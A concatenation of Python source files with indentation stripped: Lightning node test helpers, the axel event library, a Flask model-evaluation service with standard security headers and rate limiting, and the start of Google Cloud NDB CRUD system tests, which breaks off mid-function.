wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
def config(self, config_name):
try:
opt = self.rpc.listconfigs(config_name)
return opt[config_name]
except RpcError:
return None
@contextmanager
def flock(directory: Path):
"""A fair filelock, based on atomic fs operations.
"""
if not isinstance(directory, Path):
directory = Path(directory)
d = directory / Path(".locks")
os.makedirs(str(d), exist_ok=True)
fname = None
while True:
# Try until we find a filename that doesn't exist yet.
try:
fname = d / Path("lock-{}".format(time.time()))
fd = os.open(str(fname), flags=os.O_CREAT | os.O_EXCL)
os.close(fd)
break
except FileExistsError:
time.sleep(0.1)
# So now we have a position in the lock, let's check if we are the
# next one to go:
while True:
files = sorted([f for f in d.iterdir() if f.is_file()])
# We're queued, so it should at least have us.
assert len(files) >= 1
if files[0] == fname:
break
time.sleep(0.1)
# We can continue
yield fname
# Remove our file, so the next one can go ahead.
fname.unlink()
class Throttler(object):
"""Throttles the creation of system-processes to avoid overload.
There is no reason to overload the system with too many processes
being spawned or run at the same time. It causes timeouts by
aggressively preempting processes and swapping if the memory limit is
reached. In order to reduce this loss of performance we provide a
`wait()` method which will serialize the creation of processes, but
also delay if the system load is too high.
Notice that technically we are throttling too late, i.e., we react
to an overload, but chances are pretty good that some other
already running process is about to terminate, and so the overload
is short-lived. We throttle when the process object is first
created, not when restarted, in order to avoid delaying running
tests, which could cause more timeouts.
"""
def __init__(self, directory: str, target: float = 90):
"""If specified we try to stick to a load of target (in percent).
"""
self.target = target
self.current_load = self.target # Start slow
psutil.cpu_percent() # Prime the internal load metric
self.directory = directory
def wait(self):
start_time = time.time()
with flock(self.directory):
# We just got the lock, assume someone else just released it
self.current_load = 100
while self.load() >= self.target:
time.sleep(1)
self.current_load = 100 # Back off slightly to avoid triggering right away
print("Throttler delayed startup for {} seconds".format(time.time() - start_time))
def load(self):
"""An exponential moving average of the load
"""
decay = 0.5
load = psutil.cpu_percent()
self.current_load = decay * load + (1 - decay) * self.current_load
return self.current_load
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, request, testname, bitcoind, executor, directory,
db_provider, node_cls, throttler, jsonschemas):
if request.node.get_closest_marker("slow_test") and SLOW_MACHINE:
self.valgrind = False
else:
self.valgrind = VALGRIND
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
self.throttler = throttler
self.jsonschemas = jsonschemas
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'allow_warning',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip',
'start',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 11000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, may_fail=False,
expect_fail=False, cleandir=True, **kwargs):
self.throttler.wait()
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if cleandir and os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, self.valgrind, db=db,
port=port, options=options, may_fail=may_fail or expect_fail,
jsonschemas=self.jsonschemas,
**kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
# Capture stderr if we're failing
if expect_fail:
stderr = subprocess.PIPE
else:
stderr = None
node.start(wait_for_bitcoind_sync, stderr=stderr)
except Exception:
if expect_fail:
return node
node.daemon.stop()
raise
return node
def join_nodes(self, nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, announce_channels=True) -> None:
"""Given nodes, connect them in a line, optionally funding a channel"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
connections = [(nodes[i], nodes[i + 1]) for i in range(len(nodes) - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return
bitcoind = nodes[0].bitcoin
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txids = []
for src, dst in connections:
txids.append(src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)['txid'])
wait_for(lambda: set(txids).issubset(set(bitcoind.rpc.getrawmempool())))
# Confirm all channels and wait for them to become usable
bitcoind.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
scids.append(scid)
# Wait for all channels to be active (locally)
for i, n in enumerate(scids):
nodes[i].wait_channel_active(scids[i])
nodes[i + 1].wait_channel_active(scids[i])
if not wait_for_announce:
return
bitcoind.generate_block(5)
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
nodes[0].wait_channel_active(scids[-1])
nodes[-1].wait_channel_active(scids[0])
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
def line_graph(self, num_nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
self.join_nodes(nodes, fundchannel, fundamount, wait_for_announce, announce_channels)
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not self.valgrind and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
axel.py
|
# axel.py
#
# Copyright (C) 2016 Adrian Cristea adrian dot cristea at gmail dotcom
#
# Based on an idea by Peter Thatcher, found on
# http://www.valuedlessons.com/2008/04/events-in-python.html
#
# This module is part of axel and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
#
# Contributors:
# Erwin Mayer <traderwin at gmail dot com>
# Rob van der Most <Rob at rmsoft dot nl>
#
# Source: http://pypi.python.org/pypi/axel
# Docs: http://packages.python.org/axel
import sys, threading
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
class Event(object):
"""
Event object inspired by C# events. Handlers can be registered and
unregistered using += and -= operators. Execution and result are
influenced by the arguments passed to the constructor and += method.
from axel import Event
event = Event()
def on_event(*args, **kw):
return (args, kw)
event += on_event # handler registration
print(event(10, 20, y=30))
>> ((True, ((10, 20), {'y': 30}), <function on_event at 0x00BAA270>),)
event -= on_event # handler is unregistered
print(event(10, 20, y=30))
>> None
class Mouse(object):
def __init__(self):
self.click = Event(self)
self.click += self.on_click # handler registration
def on_click(self, sender, *args, **kw):
assert isinstance(sender, Mouse), 'Wrong sender'
return (args, kw)
mouse = Mouse()
print(mouse.click(10, 20))
>> ((True, ((10, 20), {}),
>> <bound method Mouse.on_click of <__main__.Mouse object at 0x00B6F470>>),)
mouse.click -= mouse.on_click # handler is unregistered
print(mouse.click(10, 20))
>> None
"""
def __init__(self, sender=None, asynch=False, exc_info=False,
threads=3, traceback=False):
""" Creates an event
asynch
if True, handlers are executed asynchronously (the main thread is not
waiting for handlers execution to complete). In this case, no data
regarding the success and result of the execution is returned.
exc_info
if True, result will contain sys.exc_info()[:2] on error
sender
event's sender. The sender is passed as the first argument to the
handler, only if is not None. For this case the handler must have
a placeholder in the arguments to receive the sender
threads
maximum number of threads that will be started for handlers execution
threads = 0:
- synchronized execution in the main thread
- asynch must be False
threads = 1:
- synchronized execution in separate thread
- asynch can be True or False
threads > 1:
- desynchronized execution in separate threads
- asynch can be True or False
visual representation:
threads = 0:
[Main Thread]: event (handler1, handler2, handler3, handler4)
[Main Thread]: ..handler1, handler2, handler3, handler4
threads = 1:
[Main Thread]: event (handler1, handler2, handler3, handler4)
[Thread-1]: ..handler1, handler2, handler3, handler4
threads > 1 (let's say 2): (thread switch is not accurate)
[Main Thread]: event (handler1, handler2, handler3, handler4)
[Thread-1]: ..handler1 <= assume short running
[Thread-2]: ..handler2 <= assume long running
[Thread-1]: ..handler3 <= assume short running
[Thread-1]: ..handler4 <= assume short running
traceback
if True, the execution result will contain sys.exc_info()
on error. exc_info must be also True to get the traceback
hash = hash(handler)
Handlers are stored in a dictionary that has as keys the handler's hash
handlers = {
hash : (handler, memoize, timeout),
hash : (handler, memoize, timeout), ...
}
The execution result is cached using the following structure
memoize = {
hash : ((args, kw, result), (args, kw, result), ...),
hash : ((args, kw, result), ...), ...
}
The execution result is returned as a tuple having this structure
exec_result = (
(True, result, handler), # on success
(False, error_info, handler), # on error
(None, None, handler), ... # asynchronous execution
)
"""
if asynch and threads == 0:
raise ValueError('Asynch execution is only possible if threads > 0')
self.asynch = bool(asynch)
self.exc_info = bool(exc_info)
self.sender = sender
self.threads = int(threads)
self.traceback = bool(traceback)
self.handlers = {}
self.memoize = {}
self._mlock = threading.RLock() # lock the caching structure
def handle(self, handler):
""" Registers a handler. The handler can be transmitted together
with two arguments as a list or dictionary. The arguments are:
memoize
if True, the execution result will be cached in self.memoize
timeout
will allocate a predefined time interval for the execution
If arguments are provided as a list, they are considered to have
this sequence: (handler, memoize, timeout)
Examples:
event += handler
event += (handler, True, 1.5)
event += {'handler':handler, 'memoize':True, 'timeout':1.5}
"""
handler_, memoize, timeout = self._extract(handler)
self.handlers[hash(handler_)] = (handler_, memoize, timeout)
return self
def unhandle(self, handler):
""" Unregisters a handler """
h, _, _ = self._extract(handler)
key = hash(h)
if not key in self.handlers:
raise ValueError('Handler "%s" was not found' % str(h))
del self.handlers[key]
return self
def fire(self, *args, **kw):
""" Stores all registered handlers in a queue for processing """
result = []
if self.threads == 0: # same-thread execution - synchronized
if self.handlers:
for k in self.handlers:
# handler, memoize, timeout
h, m, t = self.handlers[k]
try:
r = self._memoize(h, m, t, *args, **kw)
result.append(tuple(r))
except:
result.append((False, self._error(sys.exc_info()), h))
elif self.threads > 0: # multi-thread execution - desynchronized if self.threads > 1
queue = Queue()
# result lock just in case [].append() is not
# thread-safe in other Python implementations
rlock = threading.RLock()
def _execute(*args, **kw):
""" Executes all handlers stored in the queue """
while True:
try:
item = queue.get()
if item is None:
queue.task_done()
break
# handler, memoize, timeout
h, m, t = self.handlers[item]
try:
r = self._memoize(h, m, t, *args, **kw)
if not self.asynch:
with rlock:
result.append(tuple(r))
except:
if not self.asynch:
with rlock:
result.append((False, self._error(sys.exc_info()), h))
queue.task_done()
except Empty: # never triggered, just to be safe
break
if self.handlers:
threads = self._threads()
for _ in range(threads):
t = threading.Thread(target=_execute, args=args, kwargs=kw)
t.daemon = True
t.start()
for k in self.handlers:
queue.put(k)
if self.asynch: # main thread, no locking required
h, _, _ = self.handlers[k]
result.append((None, None, h))
for _ in range(threads):
queue.put(None) # stop each worker
if not self.asynch:
queue.join()
return tuple(result) or None
def count(self):
""" Returns the count of registered handlers """
return len(self.handlers)
def clear(self):
""" Discards all registered handlers and cached results """
self.handlers.clear()
self.memoize.clear()
def _extract(self, item):
""" Extracts a handler and handler's arguments that can be provided
as list or dictionary. If arguments are provided as list, they are
considered to have this sequence: (handler, memoize, timeout)
Examples:
event += handler
event += (handler, True, 1.5)
event += {'handler':handler, 'memoize':True, 'timeout':1.5}
"""
if not item:
raise ValueError('Invalid arguments')
handler = None
memoize = False
timeout = 0
if not isinstance(item, (list, tuple, dict)):
handler = item
elif isinstance(item, (list, tuple)):
if len(item) == 3:
handler, memoize, timeout = item
elif len(item) == 2:
handler, memoize = item
elif len(item) == 1:
handler = item
elif isinstance(item, dict):
handler = item.get('handler')
memoize = item.get('memoize', False)
timeout = item.get('timeout', 0)
return (handler, bool(memoize), float(timeout))
def _memoize(self, handler, memoize, timeout, *args, **kw):
""" Caches the execution result of successful executions
hash = hash(handler)
memoize = {
hash : ((args, kw, result), (args, kw, result), ...),
hash : ((args, kw, result), ...), ...
}
"""
if not isinstance(handler, Event) and self.sender is not None:
args = list(args)[:]
args.insert(0, self.sender)
if not memoize: # no caching
if timeout <= 0: # no time restriction
return [True, handler(*args, **kw), handler]
result = self._timeout(timeout, handler, *args, **kw)
if isinstance(result, tuple) and len(result) == 3:
if isinstance(result[1], Exception): # error occurred
return [False, self._error(result), handler]
return [True, result, handler]
else: # caching
hash_ = hash(handler)
if hash_ in self.memoize:
for args_, kw_, result in self.memoize[hash_]:
if args_ == args and kw_ == kw: # shallow structure comparison only
return [True, result, handler]
if timeout <= 0: # no time restriction
result = handler(*args, **kw)
else:
result = self._timeout(timeout, handler, *args, **kw)
if isinstance(result, tuple) and len(result) == 3:
if isinstance(result[1], Exception): # error occurred
return [False, self._error(result), handler]
with self._mlock: # cache structure lock
if hash_ not in self.memoize:
self.memoize[hash_] = []
self.memoize[hash_].append((args, kw, result))
return [True, result, handler]
def _timeout(self, timeout, handler, *args, **kw):
""" Controls the time allocated for the execution of a method """
t = spawn_thread(target=handler, args=args, kw=kw)
t.daemon = True
t.start()
t.join(timeout)
if not t.is_alive():
if t.exc_info:
return t.exc_info
return t.result
else:
try:
msg = '[%s] Execution was forcefully terminated'
raise RuntimeError(msg % t.name)
except:
return sys.exc_info()
def _threads(self):
""" Calculates maximum number of threads that will be started """
if self.threads < len(self.handlers):
return self.threads
return len(self.handlers)
def _error(self, exc_info):
""" Retrieves the error info """
if self.exc_info:
if self.traceback:
return exc_info
return exc_info[:2]
return exc_info[1]
__iadd__ = handle
__isub__ = unhandle
__call__ = fire
__len__ = count
class spawn_thread(threading.Thread):
""" Spawns a new thread and returns the execution result """
def __init__(self, target, args=(), kw={}, default=None):
threading.Thread.__init__(self)
self._target = target
self._args = args
self._kwargs = kw
self.result = default
self.exc_info = None
def run(self):
try:
self.result = self._target(*self._args, **self._kwargs)
except:
self.exc_info = sys.exc_info()
finally:
del self._target, self._args, self._kwargs
|
main.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Evaluate Service of the service."""
import logging
import os
import glob
import multiprocessing
import time
import shutil
import datetime
import traceback
import argparse
from flask import abort, Flask, request
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from flask_restful import Resource, Api
try:
from werkzeug import secure_filename
except Exception:
from werkzeug.utils import secure_filename
from evaluate_service import security
from evaluate_service.class_factory import ClassFactory
from .hardwares import Davinci
from .run_flask import run_flask, get_white_list, get_request_frequency_limit
app = Flask(__name__)
app.config["MAX_CONTENT_LENGTH"] = 2048 * 1024 * 1024 # 2GB
api = Api(app)
@app.after_request
def after_request(response):
"""Add custom headers for Security reasons."""
ContentSecurityPolicy = ''
ContentSecurityPolicy += "default-src 'self'; "
ContentSecurityPolicy += "script-src 'self' 'unsafe-inline'; "
ContentSecurityPolicy += "style-src 'self' 'unsafe-inline'; "
ContentSecurityPolicy += "img-src 'self' data:; "
ContentSecurityPolicy += "connect-src 'self';"
response.headers.add('Content-Security-Policy', ContentSecurityPolicy)
response.headers.add('X-Content-Type-Options', 'nosniff')
response.headers.add('Strict-Transport-Security', 'max-age=31536000; includeSubDomains')
response.headers.add('X-Frame-Options', 'deny')
response.headers.add('Access-Control-Allow-Methods', 'POST')
response.headers.add('X-XSS-Protection', '1; mode=block')
response.headers.add('Cache-Control', 'no-cache, no-store, must-revalidate')
response.headers.add('Pragma', 'no-cache')
response.headers.add('Expires', '0')
response.headers.add('Connection', 'close')
return response
limiter = Limiter(
app,
key_func=get_remote_address,
default_limits=["100/minute"]
)
@app.before_request
def limit_remote_addr():
"""Set limit remote address."""
client_ip = str(request.remote_addr)
white_list = get_white_list()
if Evaluate.security_mode and white_list is not None and client_ip not in white_list:
abort(403)
class Evaluate(Resource):
"""Evaluate Service for service."""
security_mode = False
decorators = [limiter.limit(get_request_frequency_limit, exempt_when=lambda: not Evaluate.security_mode)]
def __init__(self):
self.result = {"latency": "9999", "out_data": [], "status": "sucess", "timestamp": "", "error_message": ""}
@classmethod
def _add_params(cls, work_path, security_mode, optional_params):
cls.current_path = work_path
cls.security_mode = security_mode
cls.optional_params = optional_params
def options(self):
"""Return options."""
return {"message": "The method is not allowed for the requested URL."}, 405
def post(self):
"""Interface to response to the post request of the client."""
try:
self.parse_paras()
self.upload_files()
self.hardware_instance = ClassFactory.get_cls(self.hardware)(self.optional_params)
except Exception as e:
self.result["status"] = "Params error."
self.result["error_message"] = str(e)
logging.error("[ERROR] Params error!")
logging.debug(traceback.print_exc())
return self.result, 400
if self.reuse_model:
logging.warning("Reuse the model, no need to convert the model.")
else:
try:
self.hardware_instance.convert_model(backend=self.backend, model=self.model, weight=self.weight,
save_dir=self.share_dir, input_shape=self.input_shape,
out_nodes=self.out_nodes, precision=self.precision)
except Exception as e:
self.result["status"] = "Model convert failed."
self.result["error_message"] = str(e)
logging.error("[ERROR] Model convert failed!")
logging.debug(traceback.print_exc())
return self.result, 400
try:
latency_sum = 0
for repeat in range(self.repeat_times):
is_last = True if repeat == self.repeat_times - 1 else False
latency, output = self.hardware_instance.inference(converted_model=self.share_dir,
input_data=self.input_data,
is_last=is_last,
cal_metric=self.cal_metric)
latency_sum += float(latency)
self.result["latency"] = latency_sum / self.repeat_times
self.result["out_data"] = output
except Exception as e:
self.result["status"] = "Inference failed."
self.result["error_message"] = str(e)
logging.error("[ERROR] Inference failed! ")
logging.debug(traceback.print_exc())
return self.result, 400
return self.result, 200
def parse_paras(self):
"""Parse the parameters in the request from the client."""
self.backend = request.form["backend"]
self.hardware = request.form["hardware"]
self.reuse_model = bool(request.form["reuse_model"].upper() == "TRUE")
self.cal_metric = bool(request.form["cal_metric"].upper() == "TRUE")
self.job_id = request.form["job_id"]
self.input_shape = request.form.get("input_shape", type=str, default="")
self.out_nodes = request.form.get("out_nodes", type=str, default="")
self.repeat_times = int(request.form.get("repeat_times"))
self.precision = request.form.get("precision", type=str, default="FP32")
if self.security_mode:
security.args.check_backend(self.backend)
security.args.check_hardware(self.hardware)
security.args.check_job_id(self.job_id)
security.args.check_input_shape(self.input_shape)
security.args.check_out_nodes(self.out_nodes)
security.args.check_repeat_times(self.repeat_times)
security.args.check_precision(self.precision)
def upload_files(self):
"""Upload the files from the client to the service."""
self.now_time = datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')
self.result["timestamp"] = self.now_time
logging.warning("The timestamp is {}.".format(self.now_time))
self.upload_file_path = os.path.join(self.current_path, "out", self.now_time)
self.share_dir = os.path.join(self.current_path, "out", self.job_id)
os.makedirs(self.upload_file_path)
os.makedirs(self.share_dir)
patterns = [".pkl", ".pth", ".pt", ".pb", ".ckpt", ".air", '.om',
".onnx", ".caffemodel", ".pbtxt", ".prototxt"]
model_file = request.files.get("model_file")
if model_file is not None:
self.model = self.upload_file_path + "/" + secure_filename(model_file.filename)
if os.path.splitext(self.model)[1] not in patterns:
raise ValueError(f'{model_file.filename} file type is not supported.')
model_file.save(self.model)
data_file = request.files.get("data_file")
if data_file is not None:
self.input_data = self.upload_file_path + "/" + secure_filename(data_file.filename)
if not os.path.basename(self.input_data) == 'input.bin':
raise ValueError(f'data {data_file.filename} file is not supported.')
data_file.save(self.input_data)
weight_file = request.files.get("weight_file")
if weight_file is not None:
self.weight = self.upload_file_path + "/" + secure_filename(weight_file.filename)
if os.path.splitext(self.weight)[1] not in patterns:
raise ValueError(f'{weight_file.filename} file type is not supported.')
weight_file.save(self.weight)
else:
self.weight = ""
logging.warning("upload file sucess!")
def _clean_data_path(clean_interval, work_path):
while True:
_clean_time = time.time() - clean_interval
folder_pattern = "{}/out/*".format(work_path)
folders = glob.glob(folder_pattern)
for folder in folders:
if os.path.isdir(folder) and os.path.getctime(folder) < _clean_time:
logging.warning("remove old folder: {}".format(folder))
try:
shutil.rmtree(folder)
except Exception:
logging.warning("failed to remove {}".format(folder))
time.sleep(3600)
def _parse_args():
parser = argparse.ArgumentParser(description="Evaluate service")
parser.add_argument("-i", "--host_ip", type=str, required=True, help="the ip of the evaluate service machine")
parser.add_argument("-p", "--port", type=int, required=False, default=8888, help="the listening port")
parser.add_argument("-w", "--work_path", type=str, required=True, help="the work dir to save the file")
parser.add_argument("-t", "--davinci_environment_type", type=str, required=False, default="ATLAS300",
help="the type the davinci hardwares")
parser.add_argument("-c", "--clean_interval", type=int, required=False, default=1 * 6 * 3600,
help="the time interval to clean the temp folder")
parser.add_argument("-u", "--ddk_user_name", type=str, required=False, default="user",
help="the user to acess ATLAS200200 DK")
parser.add_argument("-atlas_host_ip", "--atlas_host_ip", type=str, required=False, default=None,
help="the ip of ATLAS200200 DK")
parser.add_argument("-s", "--security_mode", action='store_true',
help="enable safe mode")
args = parser.parse_args()
return args
def run():
"""Run the evaluate service."""
args = _parse_args()
ip_address = args.host_ip
listen_port = args.port
clean_interval = args.clean_interval
work_path = args.work_path
security_mode = args.security_mode
if security_mode:
os.umask(0o077)
optional_params = {"davinci_environment_type": args.davinci_environment_type,
"ddk_user_name": args.ddk_user_name,
"atlas_host_ip": args.atlas_host_ip
}
p = multiprocessing.Process(target=_clean_data_path, args=(clean_interval, work_path), daemon=True)
p.start()
Evaluate._add_params(work_path, args.security_mode, optional_params)
api.add_resource(Evaluate, '/')
run_flask(app, host=ip_address, port=listen_port, security_mode=security_mode)
|
test_crud.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for Create, Update, Delete. (CRUD)
"""
import datetime
import functools
import operator
import os
import random
import threading
import zlib
try:
from unittest import mock
except ImportError:
import mock
import pytest
import test_utils.system
from google.cloud import ndb
from google.cloud.ndb import _cache
from google.cloud.ndb import global_cache as global_cache_module
from tests.system import KIND, eventually
USE_REDIS_CACHE = bool(os.environ.get("REDIS_CACHE_URL"))
def _equals(n):
return functools.partial(operator.eq, n)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
def test_retrieve_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
assert key.get() is entity
def test_retrieve_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert cache_key in cache_dict
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_retrieve_entity_with_redis_cache(ds_entity, redis_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert redis_context.global_cache.redis.get(cache_key) is not None
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_not_found(ds_entity):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_nested_tasklet(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
@ndb.tasklet
def get_foo(key):
entity = yield key.get_async()
raise ndb.Return(entity.foo)
key = ndb.Key(KIND, entity_id)
assert get_foo(key).result() == 42
@pytest.mark.usefixtures("client_context")
def test_retrieve_two_entities_in_parallel(ds_entity):
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
@ndb.tasklet
def get_two_entities():
entity1, entity2 = yield key1.get_async(), key2.get_async()
raise ndb.Return(entity1, entity2)
entity1, entity2 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entities_in_parallel_nested(ds_entity):
"""Regression test for #357.
https://github.com/googleapis/python-ndb/issues/357
"""
